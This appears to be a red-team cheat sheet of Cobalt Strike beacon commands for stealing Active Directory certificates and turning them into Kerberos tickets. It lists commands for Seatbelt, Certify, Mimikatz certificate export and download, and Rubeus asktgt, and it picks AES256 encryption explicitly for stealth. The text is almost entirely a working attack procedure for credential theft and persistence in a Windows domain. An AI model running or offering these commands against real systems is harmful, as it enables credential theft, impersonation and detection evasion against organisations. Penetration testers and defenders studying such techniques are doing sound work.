To dump existing certficate used for authentication by the current user:

# For user account certs
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

It is also possible to just request a certificate using default templates (see AD CS to obtain a list of CAs):

# For user account certs
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:[ca-srv-fqdn]\[ca-name] /template:User
 
# For machine account certs
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:[ca-srv-fqdn]\[ca-name] /template:Machine /machine

Mimikatz can be used to dump certificates to disk (password is “mimikatz”).

# For user account certs
beacon> mimikatz crypto::certificates /export
 
# For machine account certs
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
 
# Access via View > Downloads.
beacon> download <filename>.pfx

To use the certificate to obtain TGT (paste base64-encoded certificate; ticket encryption type is set to AES256 for stealth):

# For user account cert
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[user] /certificate:[cert-base64] /password:mimikatz /enctype:aes256 /nowrap
 
# For machine account cert
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[machine-account] /enctype:aes256 /certificate:[cert-base64] /password:mimikatz /nowrap